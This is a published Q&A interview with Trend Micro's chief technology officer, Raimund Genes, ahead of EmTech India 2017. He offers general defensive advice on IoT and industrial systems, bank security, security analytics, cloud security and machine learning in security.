Mumbai: With over 30 years of computer and network security experience, Raimund Genes is currently chief technology officer at Trend Micro Inc., one of the leading security solutions providers in the world. In an interview, Genes talks about keeping hackers at bay in an increasingly connected world, devising a security strategy for the Internet of Things (IoT) and how machine learning may impact security in future. He will also address EmTech India 2017—an emerging technology conference organized by Mint and MIT Technology Review—on 10 March in New Delhi. Edited excerpts:
As the world is getting increasingly connected—e.g. connected cars, smart homes, smart cities, smart grids, etc.—are security firms able to keep pace with hackers? What steps, for instance, do you take at Trend Micro to keep ahead of the hacking race?
At Trend Micro, we have dedicated research teams looking at the digital underground to predict what the bad guys will do next. Based on this, we not only release yearly threat predictions but also brief our development teams on how to cope with these new attack methods. Thanks to this, we are seen as visionaries by analysts (Gartner’s Magic Quadrant); we are also able to execute on the vision. But to be honest, sometimes, we are also terribly wrong, like with our spyware predictions a few years ago. And, of course, within Trend Micro, we use a lot of our products to harden and lock down our back-end systems—for example, application control.
Cybercriminals have now even begun targeting IoT devices. What should firms do when devising an IoT strategy?
We need to separate IIoT (Industrial IoT) and IoT (consumer grade). Industrial devices have been around forever, and haven’t been designed to be reachable from the Internet. They are built to exist in a shielded environment—a segmented network which is isolated. And that’s how it still should be. The reality is that a lot of these systems were fine when released, but with new attack methods and unpatched vulnerabilities on these devices, it is very risky to have them in a hyper-connected environment. And the control systems (SCADA/ICS, or supervisory control and data acquisition/industrial control system) normally run on older versions of a standard operating system. These systems should be locked down, so no additional (unknown) processes can be installed there.
IoT devices, on the other hand, rely on connectivity. They have been designed with the cloud in mind—part of the functionality exists because of cloud-based data aggregation. For these devices, it is important to know what is connected and how the data is used by the device manufacturer. Companies should check with legal experts if it is, for example, OK to store health records (such as pulse, activity monitoring) in a foreign data centre. Basic guideline: Don’t be a department of “No”, you can’t stop IoT devices, but be aware of the risk, educate your staff and get backing from legal experts.
Cyberattacks clearly seem to be on the rise in the financial sector, especially with digital payments picking up around the globe. Even banks are under attack. What should banks do to keep cybercriminals at bay?
Banks need to be more strict about how computer systems are used internally. A server should only be touched by authorized and selected staff. Servers need different protection than standard endpoints. And even on a standard endpoint, in a banking environment, why should the user be able to install whatever kind of software on the desktop? We are talking about corporate assets here. Furthermore, bank employees need to be better educated about social engineering and spear phishing. I recommend frequent external penetration tests, at least once every six months.
Security analytics is being touted as the holy grail of information protection. What is your viewpoint?
There is no holy grail, there is no silver bullet. It is useful if you collect and analyse the right data. But will you find the needle in the haystack with it? A lot of companies don’t, because they don’t know what they are looking for. They only realize after a breach (which in most instances is reported by an external body) what happened and then they could trace it back with security analytics. So, security analytics plays a role, but don’t forget a proactive element which blocks and shields—especially a solid and reliable IPS (intrusion prevention system)—with vulnerability shielding.
While cloud computing has matured over the years, most firms are still wary of putting their business-critical data on the cloud—especially the public cloud. How would you compare cloud security with on-premises security today?
If implemented well, putting data in a public cloud actually could be more secure and safe. Physical safety is not an issue, while your on-premise servers could burn down or a natural disaster could wipe them out. Cloud infrastructures are more resilient. And if you use the right cloud security controls and encryption, you could put it into the cloud.
How are automation, machine-learning and artificial intelligence impacting the way networks and data are protected or will be protected in the near future?
These are additional elements to make security products better. One method by itself is not effective against all kind of attacks, but a proper combination detects more and protects better. Again, there is no silver bullet; you need a connected threat defence which automatically adjusts, and adapts and learns. Just having an isolated product relying on machine-learning on the desktop, for example, will fail when probed by a sophisticated attacker. A combination of different and layered technologies is difficult to fool. All these new techniques make sense when combined with existing ones. But let’s accept that it is an arms race—after a while, we need new techniques again.
Do you think security tends to be given the short shrift when major growth initiatives such as Digital India are undertaken? How can the balance be maintained between security requirements and the need to grow very fast?
Yes, security is not top of the mind, as it has a bad reputation of slowing down progress. I personally think that when you design something with security in mind, it does not slow down much. And when you look at the complete initiative, when you add security afterwards as a Band-Aid, it is more costly and delays or resets the initiative. One major data breach could wipe out in the public view everything positive about an initiative.